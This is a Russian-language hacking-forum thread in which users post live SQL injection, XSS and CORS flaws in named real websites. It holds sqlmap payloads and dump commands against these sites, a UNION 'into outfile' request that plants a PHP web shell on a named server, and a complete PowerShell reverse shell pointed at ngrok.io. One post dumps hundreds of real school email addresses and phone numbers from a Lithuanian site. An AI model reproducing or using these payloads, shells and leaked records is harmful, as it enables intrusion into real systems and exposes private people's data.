Найденные интересеные SQL inj & XSS

Ul0rix · 11.09.2019

Код:

Parameter: skid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: skid=-1709' OR 7993=7993-- yUsK&ti=UExQIFJ1bGUgQmFzZWQ6U2hvcCBBbGwgU2FsZSA6MToxNTo=
---
web application technology: Nginx
back-end DBMS: IBM DB2

http://www.backcountry.com/dynafit-...QIFJ1bGUgQmFzZWQ6U2hvcCBBbGwgU2FsZSA6MToxNTo= | Alexa Rank: 7831 | Country: US | Not CloudFlare

WAF type Kona

astroscylla · 17.09.2019

https://coinarbitragebot.com/market.php?ex=tradesatoshi

Код:

---
Parameter: ex (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ex=tradesatoshi' AND (SELECT 6151 FROM (SELECT(SLEEP(5)))Vxbf) AND 'mRGh'='mRGh

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: ex=-5830' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6b71,0x70466e5367766a614157636d4e496d5a43594f4e7a6b746850777a6b565559766d56694a4e456a4a,0x7162787071),NULL,NULL-- QZWc
---

[INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12

available databases [17]:                                                                                                                                                                                                            
[*] aio
[*] ayfon
[*] burkul
[*] filehippo
[*] information_schema
[*] instagramvid
[*] lyrics
[*] lyricstalk
[*] lyricx
[*] mp3_lyrics
[*] mp3bueno
[*] mp3raid
[*] mp3skull
[*] mysql
[*] performance_schema
[*] ringtone_stats
[*] seotools

g4lyfe · 17.09.2019

XSS

У вас должно быть более 1 сообщений для просмотра скрытого контента.

http://citeseerx.ist.psu.edu/oai2?verb=%3E%3Cscript

<OAI-PMH xmlns="http://www.openarchives.org/OAI/2.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd">
<responseDate>2019-09-17T08:03:37Z</responseDate>
<request>http://citeseerx.ist.psu.edu/oai2</request>
<error code="badVerb">Illegal OAI-PMH verb: ><script</error>
</OAI-PMH>

badquery · 30.09.2019

Пардноньте, апну. Стоял нужный список в врапере и туда затесался этот корейский монстр.
алекса 2.8к, посещалка 400к в день, я ради интереса пытался покрутить, но там ваф жрет прокси и посылает на север страны. Может кому интересно будет

У вас должно быть более 1 реакций для просмотра скрытого контента.

http://recruit.hankyung.com/bbs/view.php?&id=notice&no=35&page=1&old_no=34&old_id=notice&desc=desc&c

Код:

Parameter: no (GET)
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: &id=notice&no=35 AND ROW(8109,1597)>(SELECT COUNT(*),CONCAT(0x7170766271,(SELECT (ELT(8109=8109,1))),0x717a766b71,FLOOR(RAND(0)*2))x FROM (SELECT 3631 UNION SELECT 7366 UNION SELECT 6740 UNION SELECT 4307)a GROUP BY x)&page=1&old_no=34&old_id=notice&desc=desc&c

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: &id=notice&no=-5301 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766271,0x646e6946586c774e585157666957417161444d6c46587178646d5866684d556874705565466d5a41,0x717a766b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- TiOQ&page=1&old_no=34&old_id=notice&desc=desc&c

Код:

web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.1.2
back-end DBMS: MySQL >= 4.1
Database: faylen
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| userform          | 1       |
+-------------------+---------+

Database: phpmyadmin
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| mytable           | 1       |
+-------------------+---------+

Database: ipsa_dbo
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| ziptable          | 11815   |
| dtproperties      | 7       |
| admin             | 3       |
+-------------------+---------+

Database: powersploit
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| mytable           | 1       |
+-------------------+---------+

Database: recruit
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| recruit_code      | 100000  |
| zipcode           | 49029   |
| recruit_rand      | 10000   |
| recruit_code3     | 9999    |
| recruit_applicant | 528     |
| recruit_excel     | 36      |
| bbs_board         | 22      |
| recruit_admin     | 6       |
| recruit_quiz      | 4       |
| recruit_request   | 4       |
| bbs_user          | 3       |
| bbs_config        | 2       |
| a                 | 1       |
| bbs_group         | 1       |
+-------------------+---------+

BabaDook · 12.11.2019

Код:

http://ziam.ru/buy-phone.php?id=-1%27%20uNion%20SelEcT%20null,%27%3C?php%20%20system%28$_POST[%22a%22]%29;?%3E%27%20%20into%20outfile%20%20%27/home/wp/ziam/images/15.php%27+--+-

sql с хорошими правами

сам шелл

http://ziam.ru/images/15.php

Ядро ебабелно

etc/passwd · 21.11.2019

BabaDook сказал(а):
Код:
http://ziam.ru/buy-phone.php?id=-1%27%20uNion%20SelEcT%20null,%27%3C?php%20%20system%28$_POST[%22a%22]%29;?%3E%27%20%20into%20outfile%20%20%27/home/wp/ziam/images/15.php%27+--+-
sql с хорошими правами

сам шелл

http://ziam.ru/images/15.php

Ядро ебабелно

Админ просто топовый. Что сайт кривой весь, что сервер.

etc/passwd · 24.11.2019

У вас должно быть более 5 реакций для просмотра скрытого контента.

-u dating.meta.ua/search.php?action=search --data="acquaint_for1=16&acquaint_for10=8&acquaint_for11=87&acquaint_for12=6&acquaint_for13=19&acquaint_for14=86&acquaint_for15=9&acquaint_for2=85&acquaint_for3=13&acquaint_for4=17&acquaint_for5=84&acquaint_for6=15&acquaint_for7=10&acquaint_for8=7&acquaint_for9=12&acquaint_for_exist1=1&acquaint_for_exist10=1&acquaint_for_exist11=1&acquaint_for_exist12=1&acquaint_for_exist13=1&acquaint_for_exist14=1&acquaint_for_exist15=1&acquaint_for_exist16=1&acquaint_for_exist17=1&acquaint_for_exist18=1&acquaint_for_exist2=1&acquaint_for_exist3=1&acquaint_for_exist4=1&acquaint_for_exist5=1&acquaint_for_exist6=1&acquaint_for_exist7=1&acquaint_for_exist8=1&acquaint_for_exist9=1&city=0&country=0&figure1=3&figure2=5&figure3=6&figure4=4&figure5=2&figure6=1&figure_exist1=1&figure_exist2=1&figure_exist3=1&figure_exist4=1&figure_exist5=1&figure_exist6=1&has_photo=1&max_age=20&max_heght=1&min_age=20&min_height=1&my_sex=2&online=1&region=0&sex=1&who_pay=0" -p max_heght --level=5 --risk=3 --technique=BEU --dbs

У вас должно быть более 5 реакций для просмотра скрытого контента.

Gr00ve · 13.12.2019

-u https://ismaniejirobotai.ugdome.lt/index.php?mod=16 --random-agent --level=3 --risk=3 --threads=10 --dbs

+----------------------------------------------------+-----------------+
| email | phone |
+----------------------------------------------------+-----------------+
[04:07:40] [WARNING] console output will be trimmed to last 256 rows due to large table size
| ringaile.j@gmail.com | 310-49322 |
| rkersnauskiene@gmail.com | 444-49503 |
| rokuvm@rokai.kaunas.lm.lt | 343-66084 |
| rozdarzelis@yahoo.com | 313-45703 |
| rstovolos@gmail.com | 380-44849 |
| ruc@takas.lt | 448-71722 |
| rudiliumok@erdves.lt | 380-48313 |
| rudnosiukasdarzelis@gmail.com | 45-462335 |
| ruklosdarzelis@gmail.com | 443-42226 |
| rumsiskiu.darzelis@kaisiadorys.lt | 315-43271 |
| rutele@plunge.lt | 6-3007474 |
| rutelesdm@rutele.kaunas.lm.lt | 45-595324 |
| Rutos-dm@takas.lt | 343-70782 |
| ruzgumokykla@gmail.com | 37-377610 |
| rvabvm@gmail.com | 458-63278 |
| rytas.kedainiai@delfi.lt | 528-66561 |
| rytas@rytas.kaunas.lm.lt | 342-30589 |
| rytmetys@lycos.com | 657-82787 |
| rytomok@takas.lt | 46-452074 |
| sadute@gmail.com | 343-42681 |
| sakalelis@balticum-tv.lt | 347-71357 |
| sakprad@sakalelis.alytus.lm.lt | 381-56435 |
| salamiesciomokykla@gmail.com | 380-36916 |
| salantug@salantai.kretinga.lm.lt | 5-2552230 |
| salociumokykla@gmail.com | 343-72446 |
| salten@takas.lt | 345-42160 |
| saltinelis.klaipeda@gmail.com | 37-567767 |
| saltinelis12a@gmail.com | 46-442266 |
| saltinelis@ignalina.lt | 37-332692 |
| saltinelisvd@gmail.com | 443-39030 |
| saltinis.mokykla@zebra.lt | 46-453243 |
| salyssemerys@takas.lt | 37-543259 |
| samurai@mail.lt | 37-373625 |
| sanat.mokykla@gmail.com | 37-391421 |
| sanciudarzelis@gmail.com | 46-313789 |
| sanciuvm@sanciai.kaunas.lm.lt | 349-35976 |
| sanmokykla@zebra.lt | 310-44690 |
| santarves@gmail.com | 315-75560 |
| sargdarz@takas.lt | 46-322283 |
| sarkele@parabole.lt | 46-410955 |
| sasnamok@yahoo.com | 46-454149 |
| saukenai@centras.lt | 441-44191 |
| saulemok@gmail.com | 310-44126 |
| saulespradine@marsatas.lt | 443-71454 |
| sauletekioampm@takas.lt | 426-53937 |
| sauletekis9@gmail.com | 347-33189 |
| saulute@infotakas.lt | 5-2493573 |
| saulute@jonava.lt | 37-312038 |
| saulute@plunge.lt | 46-319014 |
| saulutesmd@gmail.com | 310-57176 |
| savickiene.jadvyga@gmail.com | 389-62083 |
| sdaukantopm@sdaukantas.kretinga.lm.lt | 5-2517280 |
| sedosdarzelis@gmail.com | 41-524613 |
| seiriju.darzelis@lazdijai.lt | 380-51227 |
| seiriju.mokykla@lazdijai.lt | 380-54440 |
| sekretore@atgimimas.w3.lt | 310-40665 |
| sekretore@klaipepedosausrine.lt | 46-497893 |
| sekretore@kurtieji.lt | 37-399270 |
| sekretore@pakrazantis.kelme.lm.lt | 441-40142 |
| sekretore@ramygalosgimnazija.lt | 343-52959 |
| sekretore@veivirzenugimnazija.lt | 5-2597224 |
| sekretore@vyturys.klaipeda.lm.lt | 347-38242 |
| sekretoriatas@pusaite.lt | 41-524611 |
| semeliskes@gmail.com | 37-341412 |
| semeliskiudarzelis@gmail.com | 37-451420 |
| senamiesciovm@mail.lt | 677-73072 |
| sendvaris@takas.lt | 347-37265 |
| senprad@senamiestis.alytus.lm.lt | 381-57802 |
| sepetos@mail.lt | 380-48146 |
| sermuksnele@freemail.lt | 440-53314 |
| sestoku.mokykla@lazdijai.lt | 380-48356 |
| setos.soc-centras@kedainiai.lt | 441-42881 |
| sileliskaunas@gmail.com | 45-557446 |
| silgaliai.pagrindine@takas.lt | 347-31157 |
| siloprm@silas.kaunas.lm.lt | 342-43236 |
| sim@saulute.kaunas.lm.lt | 382-45346 |
| simnovd@gmail.com | 459-35180 |
| simoniumokykla@takas.lt | 5-2460883 |
| simpriekule@gmail.com | 448-48117 |
| sitkunumokykla@gmail.com | 426-60872 |
| siupariai.rastine@erdves.lt | 5-2494487 |
| skirsnemunesmo@takas.lt | 385-58332 |
| sldpusynelis@takas.lt | 349-45 268 |
| slienava@gmail.com | 426-45226 |
| smalininkm@takas.lt | 319-48545 |
| smalsutis2@gmail.com | 425-43721 |
| smalsutis@ekspresas.lt | 46-476212 |
| smcmari@delfi.lt | 46-446322 |
| smeltesm@gmail.com | 37-542249 |
| smuikoraktelis@gmail.com | 41-426407 |
| spindulelis@res.lt | 421-43741 |
| spindulelis_kaunas@hotmail.com | 46-324124 |
| stanulionis@erdves.lt | 5-272 0555 |
| stebuliu.mokykla@lazdijai.lt | 342-31650 |
| strazdelio.m@erdves.lt | 45-464425 |
| stulginskiovm@stulginskis.kaunas.lm.lt | 340-41468 |
| stulpino.mokykla@gmail.com | 37-551874 |
| suginciu.v.m@moletai.lt | 387-66185 |
| sukioniupm@gmail.com | 5-232 2877 |
| sunskai@takas.lt | 450-56567 |
| surviliskis.mokykla@kedainiai.lt | 422-46430 |
| svalios@pasvalys.lt | 342-20056 |
| svedasu.mokykla@takas.lt | 41-559241 |
| sveicarija@zebra.lt | 37-386706 |
| sventezerio.mokykla@lazdijai.lt | 380-35128 |
| sventragiodarzelis@gmail.com | 46-440291 |
| svet.mokykla@gmail.com | 37-436036 |
| svirnelisld@gmail.com | 679-71332 |
| svm_rastine@zebra.lt | 427-42417 |
| svyturelis@balticum-tv.lt | 447-72790 |
| tauralaukis@inbox.lt | 37-561285 |
| tijunaicio.mokykla@kaisiadorys.lt | 458-57323 |
| tirkdarzelis@takas.lt | 343-41007 |
| tirkiliskiupm@takas.lt | 343-27816 |
| tirksliu.v.m@gmail.com | 37-422953 |
| traupis_mok@yahoo.com | 421-49622 |
| triskoniupm@takas.lt | 5-242 3917 |
| troskunu@takas.lt | 41-377008 |
| truskavosmokykla@gmail.com | 528-39660 |
| tukasdm@ tukas.kaunas.lm.lt | 46-346249 |
| tytuv.l.d@gmail.com | 345-49714 |
| tytvm@takas.lt | 441-41544 |
| ucnaminukas@gmail.com | 383-43710 |
| udrijos_mokykla@takas.lt | 41-373866 |
| ukrinu.mokykla@gmail.com | 386-73359 |
| universavia@gmail.com | 448-68652 |
| upninku.mokykla@gmail.com | 37-312049 |
| urbsiovm@urbsys.kaunas.lm.lt | 449-74035 |
| ustukium@pasvalys.lt | 5-251 3284 |
| uzlieknesmokykla@mail.ru | 37-345873 |
| uzvenciovidurine@takas.lt | 441-47135 |
| uzventis-zilvytis@zebra.lt | 345-43231 |
| v.d.vyturelis@takas.lt | 389-54558 |
| vabalninko.darzelis@gmail.com | 427-55242 |
| vadas3@erdves.lt | 37-563144 |
| vadokliai@erdves.lt | 443-40258 |
| vadovasberzelis@super.lt | 444-78488 |
| vadzgiriopm@gmail.com | 385-56531 |
| vaidilute@takas.lt | 45-555633 |
| vaidotopm@vaidotas.kaunas.lm.lt | 342-63423 |
| vaiguvosmokykla@takas.lt | 441-55392 |
| vaikyste@net.davgita.lt | 343-22039 |
| vaisodziai@takas.lt | 41-375824 |
| vaisvydavosvm@vaisvydava.kaunas.lm.lt | 343-29032 |
| vaivor@vaivorykste.lm.lt,vbiblio@vaivorykste.lm.lt | 448-47637 |
| vaivorykste@kalnieciai.lt | 46-345910 |
| vaivorykste@takas.lt | 37-397296 |
| vaizgantovm@vaizgantas.kaunas.lm.lt | 349-47330 |
| valakeliai@pasvalys.lt | 671-15482 |
| vandarzelis@gmail.com | 346-48415 |
| vanmokykla@gmail.com | 444-45187 |
| varlaukis@gmail.com | 458-78805 |
| varpelis.kedainiai101@gmail.com | 528-28051 |
| varpelis38@gmail.com | 447-49404 |
| varpelisdarz@takas.lt | 45-517885 |
| varpelisld@gmail.com | 46-346248 |
| vdnykstukas@zebra.lt | 656-25675 |
| vdziogelis@takas.lt | 45-552214 |
| veisieju.darzelis@lazdijai.lt | 380-43257 |
| veisieju.mokykla@lazdijai.lt | 445-78987 |
| velziodarzelis@gmail.com | 380-43142 |
| vencmok@gmail.com | 41-375396 |
| ventos.darzelis@gmail.com | 444-78502 |
| ventosvm@mazeikiai.lt | 37-345868 |
| ventos_vm@akmene.lt | 5-270 3140 |
| verdene@gmail.com | 37-383854 |
| verinelis23@gmail.com | 447-72349 |
| verinelis@takas.lt | 425-57008 |
| versme.klaipeda@gmail.com | 315-68685 |
| versmep@takas.lt | 310-44831 |
| versmes@gmail.com | 347-35155 |
| versmesvm@versme.kaunas.lm.lt | 340-64139 |
| versvuvm@versvos.kaunas.lm.lt | 349-30043 |
| veseta@delfi.lt | 5-2485988 |
| vetrungesprm@vetrunge.kaunas.lm.lt | 343-54346 |
| vezaiciudarz@takas.lt | 5-2494823 |
| vezaiciumokykla@gmail.com | 5-2494368 |
| vida.cizauskiene@gmail.com | 41-370121 |
| vida@buksavimi.lt | 41-524570 |
| videniskiupm@gmail.com | 5-2469879 |
| vidsodmla@takas.lt | 345-47689 |
| vieksniug@gmail.com | 389-71831 |
| viesintosmokykla@erdves.lt | 41-377524 |
| vievio.pradine@gmail.com | 37-362621 |
| vildm@viltis.alytus.lm.lt | 5-245 5798 |
| vileisiovm@vileisis.kaunas.lm.lt | 349-54642 |
| vilijampolesvm@vilijampole.kaunas.lm.lt | 449-46638 |
| vilkijadaigelis@zebra.lt | 346-20280 |
| vilkijosgimnazija@gmail.com | 444-60211 |
| vilkyskiu_vidm@takas.lt | 46-340415 |
| vite5@takas.lt | 347-41151 |
| vliepaite@gmail.com | 37-269220 |
| volungele@parabole.lt | 41-519039 |
| volungesvm@volunge.alytus.lm.lt | 381-50860 |
| voveraiteld@voveraite.kretinga.lm.lt | 5-2605546 |
| vplikiupagrmokykla@gmail.com | 5-2698127 |
| vpm@jurbarkas.omnitel.net | 458-51540 |
| vrcmbitute@takas.lt | 37-377627 |
| vuc@centras.kretinga.lm.lt | 5-2490237 |
| vvm@mail.lt | 342-30003 |
| vydunovm@vydunas.kaunas.lm.lt | 449-41748 |
| vyturelis.darzmok@lazdijai.lt | 444-60271 |
| vyturelis.kedainiai@gmail.com | 528-61223 |
| vyturelis012@gmail.com | 41-552232 |
| vyturelis17@gmail.com | 5-2698122 |
| vyturelis@birstonas.lt | 427-56273 |
| vyturelis@plunge.lt | -0 |
| vyturelis@zebra.lt | 449-41435 |
| vyturiovm@vyturys.kaunas.lm.lt | 449-57205 |
| vyturys@vyturys.harvista.lt | 37-566368 |
| zagares.darzelis@gmail.com | 389-55369 |
| zagaresgimnazija@gmail.com | 389-35544 |
| zagaresspecialiojikristina@gmail.com | 319-59146 |
| zapyskio.darzelis@gmail.com | 346-51805 |
| zapyskiopm@zapyskis.lm.lt | 426-60904 |
| zara@takas.lt | 46-300177 |
| zasliu.darzelis@kaisiadorys.lt | 315-29331 |
| zasliu.mokykla@kaisiadorys.lt | 460-54302 |
| zeimeliovld@yahoo.com | 310-55116 |
| zeimenos.gimnazija@gmail.com | <blank> |
| zeimiai.mokykla@gmail.com | 443-48141 |
| zelmeneliai@takas.lt | 46-445230 |
| zelsvos.mokykla@delfi.lt | 5-272 4272 |
| zemkalvarijosld@plunge.lt | 380-52878 |
| zemuogele54@mail.ru | 346-60028 |
| zemyna@dokeda.lt | 45-593296 |
| zemynapm@gmail.com | 381-49235 |
| zibartoniai@gmail.com | 386-72947 |
| ziburelio.pradine@gmail.com | 46-345911 |
| zibureliodm@ziburelis.kaunas.lm.lt | 342-49687 |
| ziburelis@ekspresas.lt | 46-444171 |
| ziburiovm@ziburys.kaunas.lm.lt | 449-43446 |
| Zibutedarzelis@yahoo.com | 340-46460 |
| zibuteinfo@gmail.com | 318-41554 |
| zibutemd@zibute.kretinga.lm.lt | 5-2352042 |
| zidikai@takas.lt | 5-234 6146 |
| zidinelisld@gmail.com | 640-19080 |
| ziezmariu.darzelis@kaisiadorys.lt | 386-74967 |
| ziezmariu.mokykla@kaisiadorys.lt | 458-41719 |
| zilvinas38@takas.lt | 45-599565 |
| zilvitis.kalvarija@gmail.com | 445-78965 |
| zilvitis@kli.lt | 45-517435 |
| zilvitis@meganet.lt | 37-345881 |
| zilvitis@takas.lt | 444-60234 |
| zilvitiskarmelava@yahoo.com | 451-40458 |
| zilvitis_mok@takas.lt | 528-32537 |
| ziogelis@res.lt | 41-378510 |
| ziogelisdarzelis9@gmail.com | 441-48328 |
| ztuckuviene@gmail.com | 345-69069 |
| zuvedradl@gmail.com | 447-42344 |
| zuvintodarzelis@gmail.com | 46-314764 |
| zvaigzdute27@takas.lt | 342-40688 |
| zvaigzdute@akmene.lt | 41-436453 |
| zvangutis@dokeda.lt | 46-324694 |
| zvirbloniuvd@gmail.com | 448-72522 |
| zvmokykla@takas.lt | 310-47648 |
+----------------------------------------------------+-----------------+

Gr00ve · 15.12.2019

-u http://starcarz.in/single-car.php?id=4875 -D starcarz -T user -C name,email,password --dump --threads=10 --random-agent --hex --is-dba

BabaDook · 01.01.2020

HTML:

https://www.comodo.com/news/press_releases/2011/02/' UnIoN SeLEcT NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bjws.html

BabaDook · 19.01.2020

YНа уязвимость года,века,минуты,секуунды не претендую, скорее мысли в слух.
Думю с таким подходим не долго будет музяка играть.
П.С было бы круто от кого-нить получить ресёрч

Код:

https://gitweb.torproject.org/
https://gitweb.torproject.org/admin/tor-jenkins.git/tree/config.xml
https://gitweb.torproject.org/admin/tor-nagios.git/tree/config/nagios-master.cfg
https://jenkins.torproject.org/user/nickm/my-views/view/All/job/tor-ci-windows-0.3.5/scmPollLog/
https://db.torproject.org/machines.cgi?host=buildbox

BabaDook · 19.01.2020

unsuccessful digital research

foadamfo · 20.01.2020

XSS, шоп de

У вас должно быть более 10 сообщений для просмотра скрытого контента.

FilSuisse – Der Faden zum Erfolg

Innovationen in Gesichtpflege, Wellness & Gesundheit.

www.filsuisse.de

The vulnerability affects https://www.filsuisse.de/ , /[*]/<s>/<s>/<s>/<s>/<s>-<n>
Discovered by /Scripts/PerScheme/XSS.script
Attack details

Path Fragment input /[*]/<s>/<s>/<s>/<s>/<s>-<n> was set to de"onmouseover=wjKQ(9269)"

HTTP request

GET /de"onmouseover=wjKQ(9269)"/magazin/rss/index/cat/innovation-mikrofibrillen-teil-2 HTTP/1.1
Referer: https://www.filsuisse.de/
Cookie: PHPSESSID=2c6ffmrgm9kddgmk6ndir0pdn4;adminhtml=74go7vh2j1qe7fuvk28b66jm90;frontend=6bttcgt8s9clgjekljl76dnge4;googtrans=/en/pl
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.filsuisse.de

The vulnerability affects https://www.filsuisse.de/pl/magazin , ___from_store
Discovered by /Scripts/PerScheme/XSS.script
URL encoded GET input ___from_store was set to de"onmouseover=4PCh(9473)"
GET /pl/magazin?___from_store=de"onmouseover=4PCh(9473)"&categories=1 HTTP/1.1
Referer: https://www.filsuisse.de/
Cookie: PHPSESSID=2c6ffmrgm9kddgmk6ndir0pdn4;adminhtml=74go7vh2j1qe7fuvk28b66jm90;frontend=6bttcgt8s9clgjekljl76dnge4;googtrans=/en/pl
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate

The vulnerability affects https://www.filsuisse.de/ , /<s>/[*]-<s>-<n>.html
Discovered by /Scripts/PerScheme/XSS.script
Path Fragment input /<s>/[*]-<s>-<n>.html was set to 8"onmouseover=2ivW(9831)"
GET /de/8"onmouseover=2ivW(9831)"-essentials-372.html HTTP/1.1
Referer: https://www.filsuisse.de/
Cookie: PHPSESSID=2c6ffmrgm9kddgmk6ndir0pdn4;adminhtml=74go7vh2j1qe7fuvk28b66jm90;frontend=6bttcgt8s9clgjekljl76dnge4;googtrans=/en/pl
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.filsuisse.de

CORS, шоп FR

У вас должно быть более 10 сообщений для просмотра скрытого контента.

https://www.joueclub.fr/

The web application fails to properly validate the Origin header (check Details section for more information) and returns the header Access-Control-Allow-Credentials: true.
Discovered by /location/cors_origin_validation.js
Attack details

Access-Control-Allow-Origin: https://www.evil.com
Access-Control-Allow-Credentials: true Any origin is accepted (Blindly reflect the Origin header value in Access-Control-Allow-Origin headers in responses)
GET / HTTP/1.1
Origin: https://www.evil.com
Cookie: PHPSESSID=992fd7199083e153bbe82ee74749086c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.joueclub.fr

foadamfo · 21.01.2020

Xss, шоп, fr

У вас должно быть более 10 сообщений для просмотра скрытого контента.

The vulnerability affects https://www.bureau-vallee.fr/
Discovered by /Scripts/PerFolder/XSS_in_URI_Folder.script
URI was set to "onmouseover='hY0R(9775)'bad="
GET /;"onmouseover='hY0R(9775)'bad=" HTTP/1.1
Referer: https://www.bureau-vallee.fr/
Cookie: PHPSESSID=f6bdd8a6a8fe155427179de989fad1f4;X-Magento-Vary=b8b2e0c0ff50465002d10551af7e8f09fe26e2bd;fstrz_vary=b8b2e0c0ff50465002d10551af7e8f09fe26e2bd;multistore_shop=BV004;private_content_version=b54aaf2ee737dce16c5421c1cd496044
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.bureau-vallee.fr

Вроде как уязвимый плагин WordPress Plugin Yoast SEO Cross-Site Scripting (11.5), шоп, fr

У вас должно быть более 10 сообщений для просмотра скрытого контента.

The vulnerability affects http://www.wel-com.fr/
Discovered by /Scripts/WebApps/wordpress_9.script
Attack details
Current plugin version: 11.2.1.
Latest plugin version: undefined.
Plugin versions lower (or equal) to 11.5 are affected.
GET /blog/wp-content/plugins/wordpress-seo/readme.txt HTTP/1.1
Cookie: PHPSESSID=ek7hibvuc73gqm69un3pi87n75;adminhtml=p6fdfgfuimip0qei6s0aqd3oe5;cookielaw=1;frontend=h4ne64u7bootgbmi58gakvm101;wordpress_8a6da6dea86f68bb9ebf92941856fe16=+;wordpress_logged_in_8a6da6dea86f68bb9ebf92941856fe16=+;wordpress_sec_8a6da6dea86f68bb9ebf92941856fe16=+;wordpress_test_cookie=WP+Cookie+check;wordpresspass_8a6da6dea86f68bb9ebf92941856fe16=+;wordpressuser_8a6da6dea86f68bb9ebf92941856fe16=+;wp-postpass_8a6da6dea86f68bb9ebf92941856fe16=+;wp-settings-0=+;wp-settings-time-0=+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.wel-com.fr

BabaDook · 16.02.2020

Вообщем не то что бы уязвимость, х#й знает куда выкладывать

Такое дело
Если на https://pastebin.com/
Загрузить реверс шелл В данным случаии я использовал

function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.

The script is derived from Powerfun written by Ben Turner & Dave Hardy

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.

.LINK

Week of PowerShell Shells - Announcement and Day 1

Home of Nikhil SamratAshok Mittal. Posts about Red Teaming, Offensive PowerShell, Active Directory and Pen Testing.

www.labofapenetrationtester.com

https://github.com/nettitude/powershell/blob/master/powerfun.ps1

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.

Nishang - Offensive PowerShell for red team, penetration testing and offensive security. - GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offens...

github.com

#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(

[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,

[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,

[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,

[Parameter(ParameterSetName="bind")]
[Switch]
$Bind

)

try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}

#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x

#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}

Invoke-PowerShellTcp -Reverse -IPAddress ngrok.io -Port порт

прямо в таком виде.
Через некторое время мы получим доступ.
Удивительно, что и и зачем действует по такому методу.

